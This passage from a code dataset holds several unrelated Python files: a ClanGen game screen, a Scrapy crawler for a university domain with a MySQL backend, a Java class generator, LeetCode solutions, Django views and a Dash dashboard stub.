game.map_info[game.switches['map_selection']][3] == 'Unclaimed':\n\n # ensures a camp bg is chosen\n random_camp_options = ['camp1', 'camp2']\n random_camp = choice(random_camp_options)\n\n buttons.draw_button(\n (-16, 300),\n text='Done',\n choosing_camp=False,\n biome=game.map_info[game.switches['map_selection']][2],\n world_seed=self.worldseed,\n camp_bg = random_camp,\n cur_screen='clan created screen')\n\n else:\n buttons.draw_button((-16, 300),\n text='Done',\n available=False)\n else:\n self.choose_camp()\n\n def choose_camp(self):\n # MAIN AND BACK BUTTONS\n draw_main_menu(self)\n\n buttons.draw_image_button((253, 645),\n button_name='last_step',\n text='< Last step',\n choosing_camp=False,\n hotkey=[0],\n size=(147, 30)\n )\n\n # BIOME BUTTONS\n buttons.draw_image_button((196, 100),\n button_name='forest',\n text='Forest',\n biome='Forest',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Forest',\n size=(100, 46),\n hotkey=[1])\n buttons.draw_image_button((304, 100),\n button_name='mountain',\n text='Mountainous',\n biome='Mountainous',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Mountainous',\n size=(106, 46),\n hotkey=[2])\n buttons.draw_image_button((424, 100),\n button_name='plains',\n text='Plains',\n biome='Plains',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Plains',\n size=(88, 46),\n hotkey=[3])\n buttons.draw_image_button((520, 100),\n button_name='beach',\n text='Beach',\n biome='Beach',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Beach',\n size=(82, 46),\n hotkey=[4])\n\n # CHOOSING CAMP ART\n self.camp_art()\n if game.settings['backgrounds']:\n\n buttons.draw_image_button((400, 645),\n button_name='done_creation',\n text='Next Step',\n available=game.switches['camp_bg'] is not None,\n cur_screen='clan created screen',\n size=(147, 30)\n )\n\n if game.switches['biome'] == 'Forest':\n buttons.draw_image_button((95, 180),\n button_name='classic_camp',\n text='Classic',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1'\n )\n buttons.draw_image_button((108, 215),\n button_name='gully_camp',\n text='Gully',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2'\n )\n\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n elif game.switches['biome'] == 'Mountainous':\n buttons.draw_image_button((111, 180),\n button_name='cliff_camp',\n text='Cliff',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1')\n buttons.draw_image_button((101, 215),\n button_name='cave_camp',\n text='Caves',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2')\n\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n elif game.switches['biome'] == 'Plains':\n buttons.draw_image_button((64, 180),\n button_name='grasslands_camp',\n text='Grasslands',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1'\n )\n buttons.draw_image_button((89, 215),\n button_name='tunnel_camp',\n text='Tunnels',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2'\n )\n\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n elif game.switches['biome'] == 
'Beach':\n buttons.draw_image_button((76, 180),\n button_name='tidepool_camp',\n text='Tidepools',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1')\n buttons.draw_image_button((65, 215),\n button_name='tidal_cave_camp',\n text='Tidal Cave',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2')\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n # PREVIEW BORDER\n screen.blit(MakeClanScreen.bg_preview_border, (167, 162))\n\n # CHOOSE RANDOM CAMP\n random_biome_options = ['Forest', 'Mountainous', 'Plains', 'Beach']\n random_biome = choice(random_biome_options)\n random_camp_options = ['camp1', 'camp2']\n random_camp = choice(random_camp_options)\n buttons.draw_image_button((255, 595),\n button_name='random_bg',\n text='Choose Random Camp Background',\n biome=random_biome,\n camp_bg=random_camp,\n available=True,\n size=(290, 30),\n cur_screen='clan created screen')\n\n else:\n buttons.draw_image_button((400, 645),\n button_name='done_creation',\n text='Next Step',\n available=game.switches['biome'] is not None,\n cur_screen='clan created screen',\n size=(147, 30)\n )\n\n def camp_art(self):\n camp_bg_base_dir = \"resources/images/camp_bg/\"\n start_leave = \"newleaf\"\n light_dark = \"light\"\n if game.settings[\"dark mode\"]:\n light_dark = \"dark\"\n\n available_biome = ['Forest', 'Mountainous', 'Plains', 'Beach']\n biome = game.switches['biome']\n if biome not in available_biome:\n biome = available_biome[0]\n biome = biome.lower()\n\n # camp_bg_base_dir already ends with a slash\n camp_bg_path_1 = f'{camp_bg_base_dir}{biome}/{start_leave}_camp1_{light_dark}.png'\n camp_bg_path_2 = f'{camp_bg_base_dir}{biome}/{start_leave}_camp2_{light_dark}.png'\n self.change_camp_art(camp_bg_path_1, camp_bg_path_2)\n\n def change_camp_art(self, camp1_path, camp2_path):\n self.camp1 = pygame.transform.scale(\n image_cache.load_image(camp1_path).convert(), (450, 400))\n self.camp2 = pygame.transform.scale(\n image_cache.load_image(camp2_path).convert(), (450, 400))\n\n\n def on_use(self):\n\n if game.switches['set_game_mode'] is False:\n self.game_mode()\n elif len(game.switches['clan_name']) == 0 and game.switches['set_game_mode'] is True:\n self.first_phase()\n elif len(game.switches['clan_name']) > 0 and game.switches['leader'] is None:\n self.second_phase()\n elif game.switches['leader'] is not None and game.switches['deputy'] is None:\n Clan.leader_lives = 9\n self.third_phase()\n elif game.switches['leader'] is not None and game.switches['medicine_cat'] is None:\n self.fourth_phase()\n elif game.switches['medicine_cat'] is not None and game.switches['choosing_camp'] is False:\n self.fifth_phase()\n elif len(game.switches['members']) != 0:\n self.sixth_phase()\n else:\n self.first_phase()\n\n def screen_switches(self):\n game.switches['game_mode'] = None\n game.switches['clan_name'] = ''\n game.switches['leader'] = None\n game.switches['cat'] = None\n game.switches['medicine_cat'] = None\n game.switches['deputy'] = None\n game.switches['members'] = []\n game.switches['choosing_camp'] = False\n game.switches['roll_count'] = 0\n create_example_cats()\n self.worldseed = randrange(10000)\n #if map_available:\n # self.world = World((44, 44), self.worldseed)\n\nclass ClanCreatedScreen(Screens):\n\n def on_use(self):\n # LAYOUT\n verdana.text('Your clan has been created and saved!', ('center', 50))\n draw_big(game.clan.leader, (screen_x / 2 - 50, 100))\n\n # buttons\n 
buttons.draw_image_button((349, 250),\n button_name='continue_small',\n text='Continue',\n cur_screen='clan screen',\n size=(102, 30),\n hotkey=[1])\n\n def screen_switches(self):\n game.clan = Clan(game.switches['clan_name'],\n game.choose_cats[game.switches['leader']],\n game.choose_cats[game.switches['deputy']],\n game.choose_cats[game.switches['medicine_cat']],\n game.switches['biome'], game.switches['world_seed'],\n game.switches['camp_site'], game.switches['camp_bg'],\n game.switches['game_mode'])\n game.clan.create_clan()\n if map_available:\n territory_claim = str(game.clan.name) + 'Clan Territory'\n otherclan_campsite = {}\n for clan in game.clan.all_clans:\n x = randrange(40)\n y = randrange(44)\n clan_camp = self.choose_other_clan_territory(x, y)\n territory_biome = str(game.map_info[clan_camp][2])\n territory_twolegs = str(game.map_info[clan_camp][4])\n territory_thunderpath = str(game.map_info[clan_camp][5])\n territory_prey = str(game.map_info[clan_camp][6])\n territory_plants = str(game.map_info[clan_camp][7])\n game.map_info[clan_camp] = [\n clan_camp[0], clan_camp[1], territory_biome,\n str(clan) + \" Camp\", territory_twolegs,\n territory_thunderpath, territory_prey, territory_plants\n ]\n otherclan_campsite[str(clan)] = clan_camp\n for y in range(44):\n for x in range(40):\n if (x, y) == (game.switches['camp_site'][0] - 1,\n game.switches['camp_site'][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (game.switches['camp_site'][0],\n game.switches['camp_site'][1] - 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (game.switches['camp_site'][0] + 1,\n game.switches['camp_site'][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (game.switches['camp_site'][0],\n game.switches['camp_site'][1] + 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n for clan in game.clan.all_clans:\n if 
(x, y) == (otherclan_campsite[str(clan)][0] - 1,\n otherclan_campsite[str(clan)][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (otherclan_campsite[str(clan)][0],\n otherclan_campsite[str(clan)][1] - 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (otherclan_campsite[str(clan)][0] + 1,\n otherclan_campsite[str(clan)][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (otherclan_campsite[str(clan)][0],\n otherclan_campsite[str(clan)][1] + 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n #save_map(game.map_info, game.switches['clan_name'])\n\n def choose_other_clan_territory(self, x, y):\n self.x = x\n self.y = y\n if game.map_info[(self.x, self.y)][3] != \"Unclaimed\":\n self.x = randrange(40)\n self.y = randrange(44)\n if game.map_info[(self.x, self.y)][3] == \"Unclaimed\":\n return self.x, self.y\n else:\n self.x = randrange(40)\n self.y = randrange(44)\n return self.x, self.y\n else:\n return self.x, self.y\n\n","repo_name":"16ar0Wow/16ar0s-modded-clangen","sub_path":"16ar0s-modded-clangen/scripts/screens/clan_creation_screens.py","file_name":"clan_creation_screens.py","file_ext":"py","file_size_in_byte":62950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6244163382","text":"import scrapy\nimport re\nimport pymysql\nimport datetime \nfrom scrapy.exceptions import IgnoreRequest\nimport logging\n\nbase_domain = 'ustc.edu.cn'\nmax_webpages_per_domain = 50000\n\nmysql_db = 'spider_ustc'\nmysql_host = 'localhost'\nmysql_user = 'spider'\nmysql_password = 'chatgpt-ustc-spider'\nmysql_table = 'webpages'\n\ndb_conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, database=mysql_db, cursorclass=pymysql.cursors.DictCursor)\nif not db_conn:\n print('database 
connection failed')\n\nglobal_page_count = dict()\nwith db_conn.cursor() as cursor:\n cursor.execute(\"SELECT * FROM domain_count\")\n domain_counts = cursor.fetchall()\n for domain_count in domain_counts:\n global_page_count[domain_count['domain']] = domain_count['page_count']\n\n\ndef save_webpage(response, utf8_body):\n with db_conn.cursor() as cursor:\n curr_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sql = \"INSERT INTO \" + mysql_table + \" (url, data, content_type, domain, crawl_time) VALUES (%s, %s, %s, %s, %s)\"\n try:\n content_type_header = response.headers.get('content-type', None)\n domain = response.url.split('/')[2].lower()\n cursor.execute(sql, (response.url, utf8_body, content_type_header, domain, curr_time))\n\n # update per-domain page count\n if domain not in global_page_count:\n global_page_count[domain] = 1\n sql = \"INSERT INTO domain_count (page_count, domain) VALUES (%s, %s)\"\n else:\n global_page_count[domain] += 1\n sql = \"UPDATE domain_count SET page_count = %s WHERE domain = %s\"\n cursor.execute(sql, (global_page_count[domain], domain))\n db_conn.commit()\n except Exception as e:\n print('Failed to save to database: ' + str(e))\n return {'url': response.url, 'time': curr_time }\n return None\n\n\nclass FilterResponses(object):\n @staticmethod\n def is_valid_response(type_whitelist, content_type_header):\n for type_regex in type_whitelist:\n if re.search(type_regex, content_type_header):\n return True\n return False\n\n def process_response(self, request, response, spider):\n #type_whitelist = (r'text/', r'application/pdf', r'application/msword', r'officedocument', r'application/vnd.ms-powerpoint', r'openxmlformats')\n type_whitelist = (r'text/', )\n content_type_header = response.headers.get('content-type', None)\n if not content_type_header:\n return response\n content_type_header = content_type_header.decode()\n if self.is_valid_response(type_whitelist, content_type_header):\n return response\n else:\n msg = \"Ignoring request {}, content-type {} was not in whitelist\".format(response.url, content_type_header)\n logging.log(logging.INFO, msg)\n raise IgnoreRequest()\n\n\nclass FilterRequests(object):\n @staticmethod\n def should_crawl(url):\n # check if the URL is valid\n if not url.startswith('http://') and not url.startswith('https://'):\n return False\n # check whether the URL is in a subdomain of the target website\n url_lowercase = url.lower()\n domain = url_lowercase.split('/')[2]\n if not re.match('([a-z0-9.-]+\\.)?' + base_domain.replace('.', '\\.'), domain):\n return False\n # skip URLs in certain domains\n skip_domains = ('mirrors.ustc.edu.cn', 'git.lug.ustc.edu.cn', 'cicpi.ustc.edu.cn')\n if domain in skip_domains:\n return False\n skip_subdomains = ('lib.ustc.edu.cn', )\n for match_domain in skip_subdomains:\n if re.match('.*' + match_domain.replace('.', '\\.'), domain):\n return False\n # avoid URLs that are too long\n if len(url) > 512:\n return False\n # check whether it is an image\n for suffix in ('jpg', 'jpeg', 'png', 'gif'):\n if url_lowercase.endswith('.' 
+ suffix):\n                return False\n        # check if we have crawled too many pages in the domain\n        if domain in global_page_count and global_page_count[domain] >= max_webpages_per_domain:\n            return False\n        return True\n\n    @staticmethod\n    def has_crawled(url):\n        # check whether the URL has been crawled\n        with db_conn.cursor() as cursor:\n            sql = \"SELECT crawl_time FROM \" + mysql_table + \" WHERE url = %s\"\n            cursor.execute(sql, (url,))\n            if cursor.fetchone():\n                return True\n        return False\n\n    @staticmethod\n    def insert_skipped_url(url):\n        with db_conn.cursor() as cursor:\n            curr_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n            try:\n                domain = url.split('/')[2].lower()\n            except:\n                domain = None\n            sql = \"INSERT INTO skipped_urls (url, domain, crawl_time) VALUES (%s, %s, %s)\"\n            try:\n                cursor.execute(sql, (url, domain, curr_time))\n                db_conn.commit()\n            except: # failed insertions may be duplicates\n                pass\n\n    def process_request(self, request, spider):\n        if self.should_crawl(request.url):\n            if not self.has_crawled(request.url):\n                return None # begin crawl\n            else:\n                raise IgnoreRequest() # has been crawled, skip silently\n        else: # an URL that should not be crawled\n            self.insert_skipped_url(request.url)\n            raise IgnoreRequest()\n\n\nclass USTCSpider(scrapy.Spider):\n    name = 'ustc-spider'\n    start_urls = ['https://' + base_domain + '/']\n\n    custom_settings = {\n        'DOWNLOADER_MIDDLEWARES': {\n            'spider.FilterResponses': 999,\n            'spider.FilterRequests': 998\n        },\n        'DOWNLOAD_MAXSIZE': 8 * 1024 * 1024,\n        'DOWNLOAD_TIMEOUT': 10,\n        'CONCURRENT_REQUESTS_PER_DOMAIN': 32,\n        'CONCURRENT_REQUESTS': 32,\n        'DEPTH_PRIORITY': 1,\n        'SCHEDULER_DISK_QUEUE': 'scrapy.squeues.PickleFifoDiskQueue',\n        'SCHEDULER_MEMORY_QUEUE': 'scrapy.squeues.FifoMemoryQueue'\n    }\n\n    def parse(self, response):\n        content_type = response.headers.get('content-type', None)\n        if content_type:\n            content_type = content_type.decode().lower()\n        else:\n            content_type = ''  # no content-type header, treat as unknown so the checks below cannot fail\n        if 'gb2312' in content_type:\n            utf8_body = response.body.decode('gb2312').encode('utf-8')\n        elif 'gbk' in content_type:\n            utf8_body = response.body.decode('gbk').encode('utf-8')\n        else:\n            utf8_body = response.body\n\n        yield save_webpage(response, utf8_body)\n\n        if content_type.startswith('text/'):\n            for next_page in response.css('a::attr(href)'):\n                yield response.follow(next_page, callback=self.parse)\n","repo_name":"bojieli/chatgpt-playground","sub_path":"spider/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"34639754898","text":"__author__ = 'dave'\nimport json\n\nclass SugarClassCreator(object):\n    def __init__(self, json_for_remote_object):\n        self.param_dict = json.loads(json_for_remote_object)\n\n    def make_property_specs(self, prop_dict):\n        property_specs = list()\n\n        for key in prop_dict.keys():\n            prop_name = key\n            prop_value = prop_dict[key]\n            type_of_prop = type(prop_value)\n            if type_of_prop is dict:\n                android_type = 'Class'\n            elif type_of_prop is list:\n                android_type = 'Array'\n            elif type_of_prop is str:\n                android_type = 'String'\n            elif type_of_prop is bool:\n                android_type = 'boolean'\n            elif type_of_prop is int:\n                android_type = 'int'\n            elif type_of_prop is float:\n                android_type = 'float'\n            else:\n                android_type = 'String'  # fallback so android_type is never unbound\n            android_prop_def = {'name':prop_name, 'type':android_type}\n            property_specs.append(android_prop_def)\n        return property_specs\n\n    def make_android_class_declaration(self, class_name):\n        cased_class_name = class_name.title()\n        new_android_class_text = 'public class ' + cased_class_name + ' extends SugarRecord<' + cased_class_name + 
'> {\\n'\n        return new_android_class_text\n\n    def make_android_prop_declaration(self, android_prop_def, is_array=False):\n        if is_array:\n            prop_type = android_prop_def['type'] + '[]'\n        else:\n            prop_type = android_prop_def['type']\n        prop_declaration = prop_type + ' ' + android_prop_def['name'].title() + ';'\n        return prop_declaration\n\n    def make_android_class_prop_declaration(self, android_class_name, is_array=False):\n        if is_array:\n            class_type = android_class_name + '[]'\n        else:\n            class_type = android_class_name\n        class_prop_declaration = class_type.title() + ' ' + android_class_name.lower() + ';'\n        return class_prop_declaration\n\n    def make_android_class(self, param_dict, android_class_name=None):\n        class_name = None\n        curr_param_dict = param_dict\n        next_param_dict = None\n\n        if android_class_name is not None:\n            android_class = self.make_android_class_declaration(android_class_name)\n        else:\n            android_class = None\n\n        while curr_param_dict is not None:\n            prop_specs = self.make_property_specs(curr_param_dict)\n            for prop_spec in prop_specs:\n                if prop_spec['type'] == 'Class':\n                    if android_class is not None:\n                        # nested class, recurse\n                        nested_class_name = prop_spec['name']\n                        nested_param_dict = curr_param_dict[nested_class_name]\n                        nested_class = self.make_android_class(nested_param_dict, nested_class_name)\n                        class_decl = self.make_android_class_prop_declaration(nested_class_name)\n                        android_class += '\\t' + class_decl + '\\n'\n                    else:\n                        android_class_name = prop_spec['name']\n                        android_class = self.make_android_class_declaration(android_class_name)\n                        next_param_dict = curr_param_dict[android_class_name]\n                elif prop_spec['type'] == 'Array':\n                    # Process the first element as representative of all elements\n                    next_param_dict = curr_param_dict[prop_spec['name']][0]\n                else:\n                    android_prop_decl = self.make_android_prop_declaration(prop_spec)\n                    android_class += '\\t' + android_prop_decl + '\\n'\n\n            curr_param_dict = next_param_dict\n            next_param_dict = None\n\n        android_class += '}\\n'\n\n        # Save class file\n        filename = android_class_name + '.java'\n        h = open(filename, 'w')\n        h.write(android_class)\n        h.close()\n\n        return android_class\n\n    def make_android_classes(self):\n        self.make_android_class(self.param_dict)","repo_name":"davidswi/Craigslist_REST","sub_path":"sugar_class_gen/class_creator.py","file_name":"class_creator.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"16989462538","text":"#\n# @lc app=leetcode id=697 lang=python3\n#\n# [697] Degree of an Array\n#\n\n# @lc code=start\nfrom typing import List\n\nclass Solution:\n    # def findShortestSubArray(self, nums: List[int]) -> int:\n    #     from collections import Counter\n    #     degree_dic = Counter(nums)\n    #     degree = max(degree_dic.values())\n    #     gap = len(nums)\n    #     reverse_nums = list(reversed(nums))\n    #     for key in degree_dic:\n    #         if degree_dic[key] == degree:\n    #             first = nums.index(key)\n    #             last = len(nums) - 1 - reverse_nums.index(key)\n    #             gap = min(last - first + 1, gap)\n    #     return gap \n    def findShortestSubArray(self, nums: List[int]) -> int:\n        left, right, count = {}, {}, {}\n        for i, x in enumerate(nums):\n            if x not in left: left[x] = i\n            right[x] = i\n            count[x] = count.get(x, 0) + 1\n        \n        ans = len(nums)\n        degree = max(count.values())\n        for x in count:\n            if count[x] == degree:\n                ans = min(ans, right[x] - left[x] + 1)\n\n        return ans\n# @lc 
code=end\n\n","repo_name":"Shawntl/Data-Structure-and-Algorithms","sub_path":"leetcode/697.degree-of-an-array.py","file_name":"697.degree-of-an-array.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17770339878","text":"from django.shortcuts import render, redirect\n\nfrom user.decorators import subject_manager\nfrom .models import Subjects, SubjectDocuments, SubjectImages\nfrom .forms import SubjectsForm, SubjectsDocumentsForm, SubjectsImageForm\nfrom objects.models import Object\n\n\ndef get_subjects(request, pk, code):\n subjects = Subjects.objects.filter(id=pk)\n for item in subjects:\n data = item.id\n image = SubjectImages.objects.filter(subject_id=data)\n documents = SubjectDocuments.objects.filter(subject_id=data)\n title = \"Суб'ект \"\n return render(request, 'objects/subjects/subjects.html',\n {'code': code, 'subjects': subjects, 'title': title, 'image': image, 'documents': documents})\n\n\n@subject_manager\ndef create_subject(request, pk, code):\n form = SubjectsForm()\n if request.method == 'POST':\n form = SubjectsForm(request.POST)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.object_id = pk\n subject.save()\n link = f'/{code}/object/{pk}'\n return redirect(link)\n return render(request, 'objects/subjects/create_subject.html', {'form': form})\n\n\n@subject_manager\ndef update_subject(request, pk, code):\n subjects = Subjects.objects.get(id=pk)\n a = Subjects.objects.filter(id=pk)\n for item in a:\n objects_id = item.object_id\n form = SubjectsForm(instance=subjects)\n if request.method == 'POST':\n form = SubjectsForm(request.POST, instance=subjects)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.object_id = objects_id\n subject.save()\n link = f'/{code}/object/{objects_id}'\n return redirect(link)\n return render(request, 'objects/subjects/create_subject.html', {'form': form})\n\n\n@subject_manager\ndef delete_subject(request, pk, code):\n subject = Subjects.objects.get(id=pk)\n object_id = subject.object_id\n\n if request.method == \"POST\":\n subject.delete()\n link = f'/{code}/object/{object_id}'\n return redirect(link)\n return render(request, 'objects/subjects/delete_subject.html', {'item': subject})\n\n\n@subject_manager\ndef create_subject_image(request, code, pk):\n form = SubjectsImageForm()\n if request.method == 'POST':\n form = SubjectsImageForm(request.POST, request.FILES)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.subject_id = pk\n subject.save()\n link = f'/{code}/object/subject/{pk}'\n return redirect(link)\n\n return render(request, 'objects/subjects/create_subject.html', {'form': form, 'code': code, 'pk': pk})\n\n\n@subject_manager\ndef delete_subject_image(request, code, pk):\n data = SubjectImages.objects.get(pk=pk)\n num = data.subject_id\n if request.method == \"POST\":\n data.delete()\n link = f\"/{code}/object/subject/{num}\"\n return redirect(link)\n return render(request, 'objects/subjects/delete_image.html', {'data': data, 'code': code, 'pk': pk})\n\n\n@subject_manager\ndef create_subject_document(request, code, pk):\n form = SubjectsDocumentsForm()\n if request.method == 'POST':\n form = SubjectsDocumentsForm(request.POST, request.FILES)\n if form.is_valid():\n subject = form.save(commit=False)\n subject.subject_id = pk\n subject.save()\n link = f'/{code}/object/subject/{pk}'\n return redirect(link)\n\n return render(request, 'objects/subjects/create_subject.html', {'form': 
form, 'code': code, 'pk': pk})\n\n\n@subject_manager\ndef delete_subject_document(request, code, pk):\n    data = SubjectDocuments.objects.get(pk=pk)\n    num = data.subject_id\n    if request.method == \"POST\":\n        data.delete()\n        link = f\"/{code}/object/subject/{num}\"\n        return redirect(link)\n    return render(request, 'objects/subjects/delete_document.html', {'data': data, 'code': code, 'pk': pk})\n","repo_name":"Por4ini/Django_project","sub_path":"subjects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"71228622827","text":"# Leetcode - https://leetcode.com/problems/find-the-town-judge/\n\nfrom collections import defaultdict\n\nclass Solution:\n\n    def findJudge(self, N, trust):\n        trust_bucket = [0] * (N + 1) # trust score per person\n\n        for a, b in trust:\n            trust_bucket[a] -= 1 # person a trusts someone, so decrement their trust score\n            trust_bucket[b] += 1 # person b is trusted, so increment their trust score\n\n        for i in range(1, N + 1):\n            if trust_bucket[i] == N - 1:\n                return i\n\n        return -1\n\nsolution = Solution()\nprint(solution.findJudge(2, [[1,2]]))","repo_name":"felipedss/algorithms","sub_path":"python/graph/find-the-town-judge.py","file_name":"find-the-town-judge.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"38154024695","text":"#!/usr/bin/python3\n\"\"\"\nA script that prompts a user to enter a string then\ndetermines if it's a palindrome\n\"\"\"\ndef reverse(text):\n\t\"\"\"Reverses a text\n\t\"\"\"\n\treturn text[::-1]\n\ndef is_palindrome(text):\n\t\"\"\"Checks whether a text equals its reverse\"\"\"\n\treturn text == reverse(text)\n\n\nsomething = input('Write something: ')\nforbidden = (' ', ',', '.', '?', '!')\n\n# strip spaces and punctuation before checking\nsomething = ''.join(c for c in something if c not in forbidden)\n\nif is_palindrome(something):\n\tprint(f'Yes \\'{something}\\' is a palindrome')\nelse:\n\tprint(f'Sorry \\'{something}\\' is not a palindrome')\n","repo_name":"yelosolutions/byte_of_python","sub_path":"input_and_output/reverse_io.py","file_name":"reverse_io.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"36705860664","text":"# Libraries in use\r\n# Database\r\nimport pymongo\r\n# Dashboard\r\nimport dash\r\nfrom dash.dependencies import Input, Output\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\n# Timescale for graphs\r\nfrom datetime import datetime, timedelta\r\n\r\n# Dashboard initialisation\r\napp = dash.Dash(__name__)\r\napp.css.config.serve_locally = False\r\napp.title = 'Virtual Manager'\r\napp.css.append_css({'external_url':'https://codepen.io/chriddyp/pen/bWLwgP.css'})\r\n\r\n# Navigation bar\r\napp.layout = html.Div([\r\n    html.Div([\r\n        html.H1('Virtual Monitor',style={\r\n            'padding': '10px',\r\n            'margin':'0',\r\n            'border': '0',\r\n            'color': '#FFFFFF',\r\n            'backgroundColor':'#263240'}),\r\n        html.Div([\r\n            dcc.Tabs(id=\"tabs\", value='tabs', children=[\r\n                dcc.Tab(label='System', value='system'),\r\n                dcc.Tab(label='Virtual Machines', value='virtual-machine'),\r\n                dcc.Tab(label='Deploy', value='Deploy'),\r\n            ]),\r\n            html.Div(id='tabs-content'),\r\n        ],className='row')\r\n    ]),\r\n\r\n    # Server settings menu\r\n    html.Div([\r\n\r\n    ], className=\"four columns\", 
